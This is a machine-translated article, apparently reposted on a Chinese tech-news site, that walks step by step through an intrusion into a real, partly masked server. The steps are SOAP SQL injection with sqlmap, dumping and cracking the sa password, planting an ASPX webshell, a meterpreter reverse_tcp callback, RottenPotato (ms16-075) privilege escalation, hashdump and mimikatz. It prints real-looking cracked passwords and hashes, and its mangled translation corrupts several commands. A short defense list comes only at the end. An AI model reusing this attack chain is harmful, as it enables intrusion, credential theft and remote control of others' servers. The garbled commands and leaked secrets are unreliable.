Shulou(Shulou.com)05/31 Report--

Many novices are not very clear about how to increase power by injecting soap into a sql2008 server combined with msf. In order to help you solve this problem, the following editor will explain it in detail. People with this need can come and learn. I hope you can get something.

In the actual successful penetration process, the use of vulnerabilities is the integration of multiple technologies, the practice of the latest technology, this penetration uses sqlmap to confirm the injection point, through sqlmap to obtain webshell, combined with msf to lift the rights of ms16-075. finally, the system permissions of the target server are obtained. This paper is a new extension of vulnerability exploitation. In the case of unsuccessful lifting of conventional Nday, it is a classic case of successful lifting of ms16-075in combination with msf.

1.1.1 scan for soap injection vulnerabilities

1. Use web services scanner in awvs for vulnerability scanning, open awvs, select web services scanner for vulnerability scanning, as shown in figure 1, fill in the target url address in wsdl url, note that it must be asmx?wsdl, and there are plenty of asmx files. If not, you can directly fill in, for example: http://1**.***.***.***:8081/?wsdl.

Figure 1 scanning for soap injection vulnerabilities

two。 Dealing with sql blind injection

Through the awvs scan, confirm that there is a sql blind injection (26) for the url address. In awvs, click "view http headers" on the right, copy its contents to a text file, and process the vulnerable statements, for example:

The red word part needs to be replaced with "- 1*".

3. The complete header package is as follows:

POST / Service1.asmx HTTP/1.1

Content-Type: text/xml

SOAPAction: "http://tempuri.org/ZcpdList"

Content-Length: 716

X-Requested-With: XMLHttpRequest

Referer: http://1**.***.***.***:8081/?wsdl

Host: 1. Thank you.

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Accept: * / *

-1 *

Response

1.1.2 identify soap injection vulnerabilities

1. Use sqlmap to detect the existence of sql injection vulnerabilities, save the contents of the previous header as 1**.***.txt, copy the file to the directory where the sqlmap.py program is located, execute the command: sqlmap.py-r 1**.***.txt, and confirm the information prompted by sqlmap:

Custom injection marker ('*') found in option'- data'. Do you want to process it? [Y/n/q] [color=Red] y[ / color]

SOAP/XML data found in POST data. Do you want to process it? [Y/n/q] [color=Red] y[ / color]

As shown in figure 2, sqlmap confirms that the sql injection vulnerability exists, and that the database server is windows 2008 R2 and the database version is sql server 2008 soap. The vulnerability is union query.

Figure 2 there is a soap injection vulnerability

two。 Check whether the database has dba permissions (1) automatically submit parameters for testing, as shown in figure 3. After executing the command: sqlmap.py-r 1**.***.txt-- is-dba-- batch, you also need to confirm y twice. Due to the use of the parameter "batch", sqlmap will automatically submit the judgment value.

Figure 3 automatic submission of parameters for judgment

(2) the user used to get the current database is the dba account. As shown in figure 4, the current user is dba in sqlmap and the display result is true. The result shows that the database uses sa permissions, and the webshell can be obtained through the os-shell parameter.

Figure 4 determines whether it is a dba account.

3. Get the sa account password

As shown in figure 5, use the command sqlmap.py-r 1**.***.txt-- password-- batch to directly obtain the password values for all accounts connected to the database:

Figure 5 get the password of sa account

4. The sa account password was cracked before successfully obtaining the database password hash value through sqlmap:

# # MS_PolicyEventProcessingLogin## [1]:

Password hash: 0x01001a7b0c5b5b347506dbc67aa8ffa2ad20f852076d8446a838 # # MS_PolicyTsqlExecutionLogin## [1]:

Password hash: 0x01006c6443e1e42ca27773d413042ee8af2eea9026d44c8d4d1c sa [1]:

Password hash: 0x0100b7b90b706f339288fb0ab4c8a099c4de53045d2de6297e28 queries www.cmd5.com for the password value "0x0100b7b90b706f339288fb0ab4c8a099c4de53045d2de6297e28" corresponding to sa. As shown in figure 6, the decryption result is "qaz123WSX".

Figure 6 decrypting the hash value of sa password

1.1.3 get webshell1 through-- os-shell. Get the command os-shell executes in sqlmap: sqlmap.py-r 1**.***.txt-- os-shell, and confirm the information in the sqlmap execution window:

You can also execute the sqlmap.py-r 1**.***.txt-- os-shell-- batch command without manual typing.

two。 Find the directory where the web program is located

(1) View documents and directories

After executing the dir c:\ command, you can view the c directory and files, and continue to view "dir c:\ inetpub\ wwwroot" as shown in figure 7. There is no web program in this folder, so exclude this directory.

Figure 7 View files and directories

(2) obtain the real directory of the website by looking at disk c, d, e and f in turn, obtain the suspected website program file on disk e, and use the command to view dir e:\ software\ AMS_NoFlow, as shown in figure 8.

Figure 8 View the website file

3. Test the real directory of the website

(1) generate the file test as shown in figure 9. Use the echo command: echo "thisis test" > e:\ software\ AMS_NoFlow\ t.txt to generate the t.txt file in the root directory of the website. The content is thisis test.

Figure 9 generate file

(2) website access test

Enter the address http://1**.***.***.***/1.txt in the browser to test, as shown in figure 10, and get the content as expected, and the directory is the real physical address of the website.

Figure 10 website access test

4. Get the contents of web.config profile

In os-shell, execute the type e:\ software\ AMS_NoFlow\ web.config command to view the contents of the web.config file. In the sqlmap command window, you may not be able to view its complete contents due to setup problems, but sqlmap will keep the details in its output directory, as shown in figure 11. Open its log file and you can see that the password corresponding to its sa account is qaz123WSX, which is consistent with the sa password cracked earlier.

Figure 11 View the contents of the web.config configuration file

5. Get ip address information

As shown in figure 12, the IP address configuration of the target can be obtained by executing the ipconfig command in os-shell. The target is configured with independent external network IP and intranet IP addresses, and other commands can be executed in os-shell.

Figure 12 get the IP address

6. Get webshell test

(1) generate shell files

Execute the command in os-shell:

Echo ^ > e:\ software\ AMS_NoFlow\ cmd.aspx

As shown in figure 13, the echo result shows 1, there is no other information, and the surface generation file command is successful.

Figure 13 generate webshell

(2) obtain webshell and use the Chinese kitchen knife backdoor management tool to create a record http://1**.***.***.***/cmd.aspx. One sentence backdoor password: pass, as shown in figure 14, successfully connects and obtains webshell.

Figure 14 get webshell

1.1.4 the conventional method failed to raise the right

1. Generate the system information file and execute the command in os-shell:

two。 Download Windows-Exploit-Suggester program Windows-Exploit-Suggester download address: https://github.com/GDSSecurity/Windows-Exploit-Suggester/

3. Update the vulnerability library and perform a windows-exploit-suggester.py-u update in python, while comparing the vulnerability library: windows-exploit-suggester.py-- audit-l-- database 2018-06-04-mssb.xls-- systeminfo SYD1-0081DSB.txt > SYD1-0081DSB-day.txt, as shown in figure 15.

Figure 15 for vulnerability comparison

4. Check the vulnerabilities and open the SYD1-0081DSB-day.txt file in the C:\ Python27 directory. As shown in figure 16, you can see that the program determines that the operating system is the windows 2008 R2 version, and there are multiple vulnerabilities. The latest vulnerability is ms16-075.

Figure 16 to view vulnerabilities

5. Carry on the lifting test to the existing vulnerabilities according to the vulnerability number, find and organize the exp file, and carry on the lifting test on the target server. Except for ms16-075exp, the tests all failed and could not raise the rights.

1.1.5 raise the rights of ms16-075 with the help of msf

1. Use msf to generate bounce Trojan Horse

Execute the command under msf:

Where the windows/meterpreter/reverse_tcp bounce port type, lhost is the Ip address of the server connected to the bounce. Note that the ip address must be a stand-alone server or a public network port mapping. In other words, the bounce must be capable of receiving, lport is the bounce port, and 4433 is the generated program.

two。 Execute monitoring commands on the listening server

(1) start msf

Msfconsole

(2) configure meterpreter parameters

3. Upload 4433.exe programs to the target server and execute

Upload the 4433.exe file to the target server and execute it through Chinese color knife or os-shell.

4. View system information

As shown in figure 17, the target bounces back to the listening server and executes sysinfo to get its system information.

Figure 17 obtaining system information

5. Failed to use meterpreter built-in entitlement feature

The getuid and getsystem commands were executed in meterpreter, respectively, as shown in figure 18, and the rights were not successfully granted.

Figure 18 failed to use the default meterpreter to lift rights

6. Use ms16-075 to claim rights

(1) ms16-075can download https://github.com/foxglovesec/RottenPotato using exp

(2) upload potato files

Upload potato.exe files via webshell, or execute the command under msf to upload: upload / root/potato.exe

(3) obtain system permissions and execute the following commands in turn:

As shown in figure 19, system permissions were successfully obtained.

Figure 19 obtaining system permissions tokens

(4) obtain the system permission to execute the command:

As shown in figure 20, the system permissions were successfully obtained.

Figure 20 obtaining system permissions

(5) obtain the password

Execute the command under meterpreter: run hashdump command, as shown in figure 21, and successfully obtain the server password hash value: Administrator:500:aad3b435b51404eeaad3b435b51404ee:a59a64a645487c1581dea603253c7920:::

Figure 21 get the password

In this example, the plaintext password is still obtained with load mimikatz, but the result is not satisfactory. Execute the command: kerberos, livessp, msv, ssp, tspkg, wdigest can not get the plaintext password. You can also execute the command mimikatz_command and enter the mimikatz command prompt to perform the operation.

(6) crack the ntml password and copy the hash value of the ntml password a59a64a645487c1581dea603253c7920 to cmd5.com for cracking. Cmd5 needs to pay for it. You can also go to: http://www.objectif-securite.ch/en/ophcrack.php and https://www.somd5.com/ websites to crack the password. As shown in figure 22, the password is successfully cracked.

Figure 22 cracking the ntlm hash

7. The login server scanned the port through nmap-sS-Pn-A 1room.login * or masscan-p 1-65535 1room.login * and found that the server opened port 3389 and logged in using mstsc. As shown in figure 23, the server successfully logged in.

Figure 23 successful login to the server

1.1.6 Summary and Defense

1. Summary of the main commands of this infiltration

(1) sqlmap executes orders

(2) execute orders under os-shell

Ipconfigdir c:/echo "thisis test" > e:\ software\ AMS_NoFlow\ t.txtecho ^ ^ > e:\ software\ AMS_NoFlow\ cmd.aspx

(3) execute the command under msf to generate a rebound Trojan:

(4) msf activation and monitoring

Msfconsoleuse exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.1.33 (actually a public network IP address) set LPORT 4433exploit

(5) order for ms16-075 Litigation of Rights

Use incognitolist_tokens-uexecute-cH-f. / potato.exelist_tokens-u impersonate_token "NT AUTHORITY\\ SYSTEM" getuid

(6) obtain the password run hashdump

(7) mimikatz to obtain the password

Load mimikatzkerberos, livessp, msv, ssp, tspkg, wdigest (command by command test, some will show clear text password) mimikatz_command:mimikatz command prompt window

(8) obtain password under mimikatz command line (untested)

two。 Infiltration summary

In this penetration, the soap injection test was carried out by sqlmap, the sql injection point was judged to be available by sqlmap, and the webshell was successfully obtained by os-shell. After obtaining the webshell, we tried to raise the rights through the conventional Nday method, but failed, and then through the cooperation of msf to carry on the ms16-075to raise the rights. Windows-Exploit-Suggester can judge and test the effect of local vulnerabilities. Through its audit, it uses the latest vulnerabilities to lift rights, with a basic hit rate of 99%.

3. Security defense

After successfully infiltrating the server, no security protection software was found on the server. based on the experience, the author recommends the following security defense:

(1) filter the soap parameters to filter some dangerous parameters that lead to sql injection.

(2) mssql database uses low-privilege users to connect to the database.

(3) the server updates and upgrades regularly.

(4) install antivirus software, waf and hardware firewall to increase the cost and difficulty of attack.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.